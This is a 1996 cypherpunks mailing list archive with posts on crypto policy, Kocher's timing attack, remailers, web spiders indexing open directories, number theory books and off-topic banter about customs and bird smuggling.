Subject: PGP for CP/M?
Message-ID: <m0tbzuO-00095oC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Okay, everybody, you can stop laughing now.  I don't really want a copy of 
PGP for CP/M, but I was just a bit curious as to whether anybody had ever 
ported it to CP/M.  Nostalgia reasons, primarily.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lindsay Haisley <fmouse@fmp.com>
Date: Mon, 15 Jan 96 15:38:32 PST
To: cypherpunks@toad.com
Subject: Eggs at Customs (fwd)
Message-ID: <199601152336.RAA14733@gateway.fmp.com>
MIME-Version: 1.0
Content-Type: text/plain


There has (fortunately!) been a big crackdown recently on the illegal pet
bird import trade, something akin to the slave trade of the 19th century for
those of us who like pet birds.  One of the methods people use to import
birds is to wear special vests full of pockets for rare bird eggs.  If the
person who wrote this was coming in from SE Asia, especially Australia, then
this was very possibly the meaning of the question.

>
>At 8:32 AM 1/15/96, Brad Shantz wrote:
>>
>>I was asked if I had any eggs.  I still don't know why.
>>
>
>Meaning you weren't cleared for expedited handling. My CIA and NSA friends
>had alerted me to this question and given me the special answer:
>
>Me: "Yes, I have green eggs, and ham, too. The eggs in Paris are especially
>fresh this time of year."
>
>This got me waved through.
>
>--Tim May
>
>
>We got computers, we're tapping phone lines, we know that that ain't allowed.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^756839 - 1  | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."
>
>
>
>
>

                                  (______)
Lindsay Haisley                     (oo)        "The bull 
FMP Computer Services         /------\/            stops here!"
fmouse@fmp.com               / |    ||  
Austin, Texas, USA          *  ||---||             * * * * * *
(512) 259-1190                 ~~   ~~         http://www.fmp.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D.R.Madden" <100611.3205@compuserve.com>
Date: Mon, 15 Jan 96 15:04:47 PST
To: C-PUNKS <cypherpunks@toad.com>
Subject: RE: Net Control is Thought Control
Message-ID: <960115230156_100611.3205_BHL49-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


DIa!?ayyyyyyyyyyyyyyyyRyyyyyyyyyyyyyyyyNDyyyyyyyyyyyyyyyyyyyytNS
e useful to set out, as I see it anyway, the main questions that need answering. Thanks for any info/insight that you can provide.

1. How is it possible -- in a legal sense -- for the laws of one state (Germany) to
    be imposed globally.
   
   I suspect the answer to this is : it isn't -- CompuServe seems to have pulled the
   plug without recourse to any legal battle (?). This makes it's protestations that it's
   all Germany's fault a little thin.

2. Even granted that Germany can impose it's porn laws on the world, how is
    CompuServe violating German law: it is *not* the case that CompuServe is producing  
    the offending material *within* Germany. Rather , German netties are able to import 
    the offending material from outwith. Hence it is the German netties (or at most the  
    German connection banks) who are violating the pornography laws.
    Analogy: if a German stationary retailer buys a stack of smutty mags in Sweden,
    which wall foul of the German smut laws, and then brings them  into Germany for  
    resale in his store, do the Germans then have a case for closing down the Swedish 
    publisher of the mags?

   Surely it is up to the German connection banks to comply with German law.     
   CompuServe doesn't export anything -- users import. This kills the Satellite porn  
   channel analogy which some people are using (UK censors some such channels).

   The Germans no doubt will argue that the above analogy is faulty in that whereas
   the import of smutty mags is (or can be) subject to border controls, the internet
   is, well, a net -- either the offending material is pulled at source or not at all.
   Not true: the offending material could be pulled from the German net servers.
   Of course, there are ways around the ban (cf. Duncan Frissel's emails passim)
   but the number of minors capable of effecting these would be negligible -- certainly
   not enough to justify 1. above (assuming that 1 can be justified upon any principle)
   
3. Why has Germany picked on CompuServe alone -- not only is it a daft law but
    one which quite obviously fails to capture the rationale behind the law (Thankfully).
   (Possibly a case of the Bavarians blowing the puritanical horn without actually wishing
    to upset the German cyber community too much. Although, interestingly, the silence
    on this issue amongst the German PC community is deafening -- I'll see if I can garner       
    any response to this, and the other points, by sending  this email to the Max-Planck  
    Institute fuer Infomatik in Germany where I used to work).

4. 1 and 3 raise the question: why did CompuServe cave in so easily? The issue could 
     have been in the European courts for the next few aeons allowing CompuServe to 
     proceed as per normal (and since the whole of the EU is effected, surely this is                                                           
     precisely the sort of issue that should be settled by their courts).

     Can any lawyers out there give an indication of the chances CompuServe would
     have in such a case?

5. Bearing above, and previous cypherpunk emails on this issue, in mind, has anyone, or 
    group actually challenged the German decision on legal grounds (as opposed to
    just discussing it)? 

6. Has anyone heard any arguments emanating from Germany itself along the "thin end of
    the wedge" lines? There are plenty of dodgey states out there who will be only too   
    willing to point at Germany, a "civilised Western culture", as a precedent to justify the 
    removal of all sorts of  topics which do not accord with their definitions of   
    acceptability.

I initially thought that Duncan's correlation of net control with thought control (cf. his email of 10th Jan, 12.52pm) was over-stepping the mark (on the grounds that we're not yet eating Clockwork Oranges in a Brave New World). But, bearing 6. in mind, if totalitarian states are able to dictate what appears on the net (and what is read by precisely the "young minds" which Germany purports to protect) then I'm beginning to think he's accurately characterised a potential state of affairs a few years down the line.

 Food for thought control.

Peter Madden

(formally of MPI, Germany, soon to be DRA, UK).

P.S. Pity the average German nettie -- they're excruciatingly embarrassed by this whole
business.

yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Jan 96 16:39:52 PST
To: cypherpunks@toad.com
Subject: Re: Eggs at Customs (fwd)
Message-ID: <ad20333b0002100438e8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:36 PM 1/15/96, Lindsay Haisley wrote:
>There has (fortunately!) been a big crackdown recently on the illegal pet
>bird import trade, something akin to the slave trade of the 19th century for
>those of us who like pet birds.  One of the methods people use to import
>birds is to wear special vests full of pockets for rare bird eggs.  If the
>person who wrote this was coming in from SE Asia, especially Australia, then
>this was very possibly the meaning of the question.

Yes, Cliff Stoll described how this plot was hatched in his book "The
Cuckoo's Egg."

(This was a yolk, folks. I stoll it.)

P.S. I am persuaded that the importation of rare tropical birds into the
U.S. is a GOOD THING, and that the attempts to ban such imports are
misguided eco-fundie efforts. Diversity will be enhanced by having the
birds in the U.S., and if left in their native jungles, most will die
anyway. Better a pampered tropical bird in a gilded cage than lunch for
some predator, or starvation as the jungles are cleared by slash-and-burn
farmers.

The same data transparency of borders, where truckloads of stuff come in
easily, means that truckloads of birds, eggs, embryos, babies, etc. can
also make it in. Most such shipments are only caught when surveillance
yields a shipping schedule...such surveillance is becoming more and more
difficult because of the technologies we push.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 15 Jan 96 18:17:39 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Eggs at Customs (fwd)
In-Reply-To: <ad20333b0002100438e8@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.960115180719.29666U-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jan 1996, Timothy C. May wrote:

> At 11:36 PM 1/15/96, Lindsay Haisley wrote:
> >There has (fortunately!) been a big crackdown recently on the illegal pet
> >bird import trade, something akin to the slave trade of the 19th century for
> >those of us who like pet birds.  One of the methods people use to import
> >birds is to wear special vests full of pockets for rare bird eggs.
> 
> Yes, Cliff Stoll described how this plot was hatched in his book "The
> Cuckoo's Egg."
> 
> (This was a yolk, folks. I stoll it.)

For that you must be punished.
 
> P.S. I am persuaded that the importation of rare tropical birds into the
> U.S. is a GOOD THING, and that the attempts to ban such imports are
> misguided eco-fundie efforts. Diversity will be enhanced by having the
> birds in the U.S., and if left in their native jungles, most will die
> anyway. Better a pampered tropical bird in a gilded cage than lunch for
> some predator, or starvation as the jungles are cleared by slash-and-burn
> farmers.

Scientifically invalid. Releasing non-native species can really wreck an
ecosystem because of the lack of evolved countermeasures. See kudzu weeds
in the South, or the Mediterranean fruit fly in California, or pigs and
sheep on tropical islands, or humans with big brains and opposable thumbs
anywhere but Africa. The better engineered solution would be to feed the
slash-and-burn farmers some other way. 

Kind of analogous to an engineer like Paul Kocher taking a hard look at
crypto systems that had only been analyzed by pure mathematicians. You 
need to feed the sniffers real entropy, not just highly evolved math.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Nobody" <mixmaster@anon.alias.net>William Bennet <x@x.x>
Date: Mon, 15 Jan 96 16:50:24 PST
To: netscape.com.don@cs.byu.edu.cypherpunks@toad.com
Subject: None
Message-ID: <199601160035.SAA00597@fuqua.fiftysix.org>
MIME-Version: 1.0
Content-Type: text/plain


> From: sameer <sameer@c2.org>
> Cc: don@cs.byu.edu, cypherpunks@toad.com
> Date: Mon, 15 Jan 1996 09:25:52 -0800 (PST)
> 
> >   I think that there are several.  The one at CMU can be reached
> > at http://anonymizer.cs.cmu.edu:8080/open.html.  I thought that
> > Sameer had one at c2.org, but a quick look at his web site didn't
> > turn up anything.
> 
> 	c2.org will be hosting the anonymizer shortly. We can't
> exactly run it off of our T1 though, so we have to wait a little while
> until we get T3 access.

Is the source code for this anonymizer publicly available?

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 15 Jan 96 16:33:18 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <ad1ff257040210044402@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.960115191659.24319E-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 15 Jan 1996, Timothy C. May wrote:

> 
> Frequent travellers to Europe will no doubt confirm what I'm saying. I
> travelled to dozens of countries in Europe a while back, and never was
> checked at any borders, save for a quick glance at my passport.
> 
> --Tim May

This may, in part, depend on your mode of transport.  Or maybe the phase 
of the moon.

In June of '93, I took a train from Rome to Nice, something which 
had worked nicely for me in the past.  That time we were all 
uncermoniously dumped out at a whistle-stop border checkpoint and forced 
to carry our luggage past some guys in uniforms.  I think some people got 
a quiz, though I did not.  After an hour or two, they let us board a 
*different* train to complete the last little bit of our journey.

That's the only border harassment I've experienced in Western Europe.  
Eastern Europe has been more interesting on occasion.  
 

Brad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Jan 96 18:41:08 PST
To: cypherpunks@toad.com
Subject: Eggs, or, To Get Some Entropy You Gotta Break Some Eggs...
Message-ID: <ad204f3303021004cb22@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(Amazing that a discussion of eggs could come back to crypto...)

At 2:17 AM 1/16/96, Rich Graves wrote:

>Kind of analogous to an engineer like Paul Kocher taking a hard look at
>crypto systems that had only been analyzed by pure mathematicians. You
>need to feed the sniffers real entropy, not just highly evolved math.

I keep thinking of different ways of looking at Kocher's timing attack.

(Paul Kocher gave a nice talk at the Bay Area Cypherpunks meeting on Saturday.)

Rich's point above suggests yet another way of looking at this: that a chip
or algorithm that can be "instrumented" (timing measured) is in some sense
too predictable. The chip itself lacks sufficient entropy.

(Before the purists, especially those who've read the paper closely, jump
on me here, I'm not saying adding random delays is the best way to deter
the attack. In fact, a variation of blinding is the best approach it seems.
(Though blinding does not affect attacks which monitor the crypto chip's or
CPU's power dissipation.))

My point, or this angle on it, is that to some extent the mechanistic
nature of the encryption process (such as Diffie-Hellman) can leak
information to an attacker who can watch the mechanistic process unfolding.

This is a result which is not surprising, in retrospect.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 15 Jan 96 17:26:09 PST
To: John Young <jya@pipeline.com>
Subject: Re: CelBomb
In-Reply-To: <199601071609.LAA23989@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.960115201641.18120C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 7 Jan 1996, John Young wrote:

>    The New York Post, Jan 6, 1996. By Uri Dan from Jerusalem
> 
>    Palestinian police said Ayash [The Engineer] was killed 
>    north of Gaza City when he answered a call on a cell 
>    phone rigged with two ounces of explosives.
> 
>    Israeli sources said the phone had been secretly traded for
>    Ayash's real phone -- and the explosion was triggered by
>    remote control once it was determined he was on the line.

This is misleading.  The Engineer was known to be surrounded by 
cellphones all the time.  Many of his closer supporters would take calls 
for him on their phones and hand the phone over for him to talk on.  This 
is why the ploy worked.  No real way to notice that his "regular" phone 
was exchanged for a new shiny one with a bulging battery pack or somesuch.

> 
>    ----------
> 
>    No brand name given, however, another source writes that 
>    Mot runs the IL cel net. So use that neat audio-vox 
>    wire on MicroTAC Elites only with paid-up Shin Bet dues, 
>    absent TS-immunization.
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf_Moeller@public.uni-hamburg.de (Ulf Moeller)
Date: Mon, 15 Jan 96 13:53:41 PST
To: cypherpunks@toad.com
Subject: Re: Bignum support added to XLISP 2.1h
Message-ID: <m0tbwbX-00007PC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


Rick Busdiecker <rfb@lehman.com> writes:
    
>    it is quite easy to write cryptographic algorithms that use very large
>    numbers without adding extra support. The downside is that the language is

>Yup.  I've written some code that generates large numbers, tests for
>primality and does RSA.  The basic RSA enclode is just (mod-expt m e
>n) and decrypt is (mod-expt c d n) where mod-expt is just an optimized
>version of (mod (expt x p) n), ala Schneier, page 200 (1st edition).

Actually, there is a modexpt (and a Fermat test) implementation
in chapter 1 of Abelson/Sussman, with a footnote mentioning
cryptography.

I do wonder if they have an export license... :)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 15 Jan 96 22:54:20 PST
To: Mark Rogaski <wendigo@pobox.com>
Subject: Re: Eggs at Customs AND a quick question
In-Reply-To: <m0tc4Px-000jQZC@gti.gti.net>
Message-ID: <Pine.SOL.3.91.960115225339.24598B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


> 
> PS -- Going to consolidate posts here.  Can someone recommend a good 
> text for an intro to Number Theory?

I've been reading "Number Theory and it's History" by Oystein Ore (1948, 
reprinted by Dover books, $9.95). It's old, but it's understandable to a 
computist like me, and if it's in print after 58 years, it can't be bad :)

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 15 Jan 96 23:45:09 PST
To: abostick@netcom.com (Alan Bostick)
Subject: Re: Digital postage and remailer abuse (was Re: Novel use of Usenet and remailersto mailbomb from luzskru@cpcnet.com)
Message-ID: <v02120d00ad21052c56c4@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:47 1/13/96, Alan Bostick wrote:

>Maybe I'm misunderstanding how using digital postage with remailers would
>work.  I was assuming that the postage stamp would be included *inside*
>the encrypted envelope, that what the remailer would do on receipt of
>mail would be: (a) decrypt the envelope; (b) validate the postage stamp;
>and (if the stamp is valid) (c) forward the message according to the
>now-decryped instructions.
>
>Using this model, if the perpetrator doesn't include a postage stamp,
>then the message is ignored.  If the perp includes a stamp, the first
>horny net geek's message is relayed but subsequent ones get bounced for
>invalid postage.

You are right.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 16 Jan 96 04:10:16 PST
To: Mark Rogaski <wendigo@pobox.com>
Subject: Number theory text
In-Reply-To: <m0tc4Px-000jQZC@gti.gti.net>
Message-ID: <Pine.3.89.9601160645.B95071-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 16 Jan 1996, Mark Rogaski wrote:

> PS -- Going to consolidate posts here.  Can someone recommend a good 
> text for an intro to Number Theory?

My school's using Elementary Number Theory and Its Applications 3rd edition
(I think it is just out) by Kenneth H. Rosen, Addison-Wesley, it seems to 
cover a bit of crypto and the latest improvements in factoring. For more 
crypto orientation, Schneier recommends A Course in Number Theory and 
Cryptography 2nd ed, Neal Koblitz, Springer-Verlag, 1994. The intro to
number theory is more of a review, but the crypto part kicks in after 
page 54 and spans the rest of the book. Getting your Num Theory from Rosen
and your crypto from Koblitz is a good bet, as your local university 
library's likely to have both (mine had both 2nd eds, just picked 'em up as
a matter of coincidence).

Rosen seems to be one of those "standard textbooks" (we're using his Discrete
Math text too) and as for Koblitz, books by Springer have extremely high 
chances of turning up in universities. (It's in the yellow Grad Texts in Math
series, not the familiar silver Lecture Notes in CS series)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 16 Jan 96 04:29:46 PST
To: cypherpunks@toad.com
Subject: TOR_del
Message-ID: <199601161229.HAA27278@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-16-96. NYPaper:

   "Louis W. Tordella, 84, Who Helped Break Cerman Military
   Code in World War II."

      A mathematician who helped break Enigma, and later 
      spent 16 years as the deputy director of the National 
      Security Agency. An intelligence visionary who had 
      helped create and shape NSA even before he became its
      deputy director in 1958, Dr. Tordella was regarded both
      as a pioneer in the development of ever more powerful
      and sophisticated computers to break enemy codes and as
      a master administrator who established a combined 
      code-breaking operation and then ran it.

      Since decryption devices did not exist, he and his
      colleagues simply designed and built them, not only
      breaking the enemy codes but helping to lay the
      theoretical and practical groundwork for what has become
      a vast computer industry.

   TOR_del

   [For more on Tordella, see Bamford's "The Puzzle Palace."]













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 16 Jan 96 01:38:47 PST
To: Jamie Zawinski <jwz@netscape.com>
Subject: Re: (none) [httpd finding your identity]
In-Reply-To: <199601150454.VAA00449@wero.cs.byu.edu>
Message-ID: <9601160932.AA03324@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Jamie Zawinski writes:
[...]
 > Very, very early betas of Netscape (around 0.6 or so, I think) did give
 > away whatever the previous page was, and I think old versions of Mosaic
 > did so as well.
Netscape still had this bug in late 0.9x beta versions (that you still
got plenty of url encoded passwords early last year)
Lynx had it at least up to 2.3.7,
etc...

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 16 Jan 96 09:04:03 PST
To: "James A. Donald" <cypherpunks@toad.com
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <199601161622.IAA28208@blob.best.net>
Message-ID: <9601161703.AA24201@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>> Bubba signed PPD 25 which permits UN control of US
>> forces, _in America_!  and allows the UN to bring in UN troops.

>While there are undoubtedly people plotting a one world government,
>the miserable performance of the blue helmets means that there
>is no present danger.  Soldiers are just not willing to die for 
>the greater glory of the United Nations.

This type of world government talk is a peculiarly US type of paranoia. 

It is clear that the people who indulge in this class of consipiracy theory do 
not believe in the US system of government, and consider it to be a failure. 
Hence the constant denigration of the political institutions, the belief that 
all institutions of government are inherently corrupt etc etc etc.

Sounds like the sort of people who should be pressing for the US to be taken 
under UN administration. After all the UNs major role is to replace governments 
where governance has failed.

A little known fact to bear in mind is that when the Treaty of Paris was signed 
the British signatory had his fingers crossed behind his back! The entire US 
constitution is thus invalid and the US is in reality still a part of the 
British Empire!


		Phill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 16 Jan 96 11:36:59 PST
To: cypherpunks@toad.com
Subject: Re: Spiderspace
Message-ID: <ad213ee71b0210041c5d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:22 PM 1/16/96, Mike McNally wrote:
>Ed Carp writes:
> > ... I was under the impression that the only documents that most web
>crawlers
> > will search are documents that are link-accessible.  Are you saying
>that this
> > isn't true?  Are you saying that Alta-Vista will search EVERYTHING that's
> > publicly accessible, whether by anonymous FTP or web?
>
>Ah, but if it hits a site that's set up with a top-level directory
>which *does* contain an "index" page but whose server *doesn't*
>recognize the index page name, then when you hit the site you
>(probably) get one of those server-generated indices.  Those things
>generally have *everything* in the directory visible (except those
>files blocked by the server configuration, usually stuff like emacs
>temp files), and so there you go...

What I've found are a lot of files which are sitting in directories. I'm
not sure I have the terminology down perfectly, but the Alta Vista search
reveals a link, I click on it, and I'm in the fairly common "Web access to
a file system" situation, where I can click on files, directories, move up
and down the directory structure, etc. The files are not "Web documents" in
the sense of having been prepared for the Web (with fancy fonts, pictures,
etc.), but they are certainly fully accessible via the Web.

--Tim

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Tue, 16 Jan 96 15:02:39 PST
To: cypherpunks@toad.com
Subject: Re: Spiderspace
Message-ID: <2.2.32.19960116231023.00616ea8@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:38 AM 1/16/96 -0800, you wrote:
>
>I've been thinking a lot about the problems and opportunities that are
>coming up as more and more "spiders" (Web searchers, crawlers) are indexing
>directories and files on systems they can find.

<a snip of agreement>


I haven't checked my logs for Alta Vista but many of the spiders do follow the robot exclusion standard. A simple text file that should be retrieved first by any spider that explains where one may not go.

The standard is fully explained at:

http://info.webcrawler.com/mak/projects/robots/norobots.html

But this does nothing for those items sitting in more traditional public space. Obscurity is no longer security.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 16 Jan 96 16:43:33 PST
To: David Lesher <wb8foz@nrk.com>
Subject: Better S/N through moderation.
In-Reply-To: <199601162143.QAA05083@nrk.com>
Message-ID: <Pine.3.89.9601161905.A76954-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 16 Jan 1996, David Lesher wrote:

> Can't we just solve the problem by making it a moderated list; 
> and make Perry the moderator?

  There are moderated versions of the list, I think cypherpunks-lite is one 
of them. You have to pay for the privilege. IMHO noise is self-regulating 
on mailing lists (as opposed to usenet). My preferred method of accessing
cypherpunks is through news://nntp.hks.net/hks.* ,which also gets you a few
other worthwhile related lists (like cyberia-l, ipsec, mixmaster...).
All the benefits of being a newsgroup without having to be on usenet.

  I am only currently subscribed directly because it is the beginning of 
the term and I can afford the time. I subscribe and unsubscribe several times
a year as time constraints permit. I think this is far preferable to having
the raw master list edited according to someone's tastes. You get the flavour
you prefer. Killfiles exist.

  It is a tribute to the usefullness of the forum and the flexibility of the
medium that there are so many ways of accessing this source of info.

Back to your regularly scheduled crypto.

(Speaking of sublists, whatever happenned to the DC-net list mentioned in 
the cyphernomicon? Is this a figment of my imagination or was there any code
written that I might partake of? Btw, why call it a DC network when it is 
really a ring? Maybe I haven't taken a good enough look at the protocol.
Dinner calls. :> )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Tue, 16 Jan 96 19:55:11 PST
To: Alan Horowitz <alanh@infi.net>
Subject: RE: Crypto anarchist getting through customs
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG960116195433HU00C501@red-70-msg.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


To expand a bit:

I don't remember if it was a lieutenant, captain, or whatever, but he passed 
out the questionnaire in futherance of his master's degree in something or 
other. One question dealt with shooting civilians who disobeyed orders to 
turn over their arms, even if they were owned under what would now be 
considered legal circumstances. Shockingly, upwards of 25% of the soldiers 
(Marines, actually, as I remember it, I'll check my references if anyone 
wants) would have no problem doing so! This in spite of the fact that 
officers in the armed forces (not sure about enlisted men, but I believe 
it's true of them as well) swear an oath to uphold the Constitution against 
all enemies foreign and domestic - and I think that under the Constitution 
as it is now, forcibly depriving people of their arms would probably be a 
reasonable basis for considering them in contravention of the Constitution, 
and therefore enemies of it.

Kurt

----------
From: 	Alan Horowitz[SMTP:alanh@infi.net]
Sent: 	Tuesday, January 16, 1996 15:20
To: 	attila
Cc: 	Timothy C. May; cypherpunks@toad.com
Subject: 	Re: Crypto anarchist getting through customs


The notorious questionaire to the SEALS wasn't an official action. It was 
one lieutenient doing an assignment for a night class.

I never said that the federal government was good, or nice, or useful. 

Alan Horowitz
alanh@norfolk.infi.net







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 16 Jan 96 21:07:35 PST
To: cypherpunks@toad.com
Subject: Re: new web security product
Message-ID: <2.2.32.19960117050925.00867c9c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:22 PM 1/16/96 +0000, you wrote:
>Perry Metzger wrote: 
>> I don't think its going to fly. No one wants to pay for an unneeded
>> $100 piece of hardware to encrypt the same credit card over and over
>> again, when a nearly zero marginal cost piece of software can do the
>> same thing.
>
>I agree with Perry. Hardware encryption does add a layer of security 
>not normally found in software, but it is hardware.
>
>Shoot, I don't even have a 28.8 modem yet, why would I want a black 
>box that supposedly does something with my Credit Cards?

This is not something that will wind up being used by the average person at
home.  It will be used by the small businessman/woman who needs to do some
credit card transactions on-line.

The media is so hyped on this "credit card on the net" train of thought that
any credit card encryption scheme will be presented as if it is for the home
user.  Just another case of the media not understanding the technology they
are reporting on...

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 16 Jan 96 19:48:33 PST
To: grafolog@netcom.com (Jonathon Blake)
Subject: Re: remarkable recent stories
In-Reply-To: <Pine.SUN.3.91.960116180817.1875C-100000@netcom15>
Message-ID: <199601170347.VAA00620@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> 	Caveat:  After decades of secrecy, the NSA has come out
> 	of the cold so to speak.  Are we to safely assume that
> 	the NSA has not had it's major mission changed in a few
> 	major ways when it came into the open?  

Banning crypto is stupid.

Banning crypto doesn't keep solid tools out of the reach of the four 
horemen.  More importantly, it won't put a dent in the underlying 
problems -- drug trafficking, money laundering, child pornography, or 
terrorism.  Anyone in America can buy any kind of drug at any time with 
almost no risk of arrest.  How much worse is crypto going to make 
things?

The crypto rules in ITAR cost US businesses a lot of money.  They're not 
doing any good, and they're doing a lot of deomonstrable harm.  If we 
don't sell crypto abraod, other countries will.  We've got a choice:  we 
can export crypto code or crypto jobs.  Let's keep the jobs.

Demonization of anyone -- even the NSA -- ought to be avoided.  

Remember when Jim Bidzos was evil incarnate?  It wasn't so long ago that
he was hassling with PRZ over the use of RSA in PGP.  Take a look at your
source trees for pgp, mixmaster, and the apache-ssl web server -- a lot of
good tools use rsaref. 

Why does Bidzos let us use rsaref?  Is it altruism?  I doubt it -- he
probably felt that it was in his best interests to maintain as much
control over his patents as he could.  Better to have everyone use rsaref
under a legitimate license than to have scofflaws ignoring your authority
all together.  If he had sued PRZ, what would he have gotten?  When you
give away PEM for nothing, what are your damages from a free PGP?  If you
go into court and PRZ wins, what then?  Anything can happen in court -- 
the patent could even get tossed out.

Bizdos gives away rsaref because it's in his interest to do so.  
Adversaries become allies when common interests develop.

The NSA ought to flip on crypto exports because it's in the national
interest to do so.  Passive surveillance is dying, no one can keep it
alive, and we should stop trading jobs, rights, and dollars to prop it up. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Beethoven <wlkngowl@unix.asb.com>
Date: Tue, 16 Jan 96 20:26:14 PST
To: cypherpunks@toad.com
Subject: Alta Vista, Great Stuff!
Message-ID: <199601170427.XAA27753@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



Hey, I saw a message on the list about personal mail
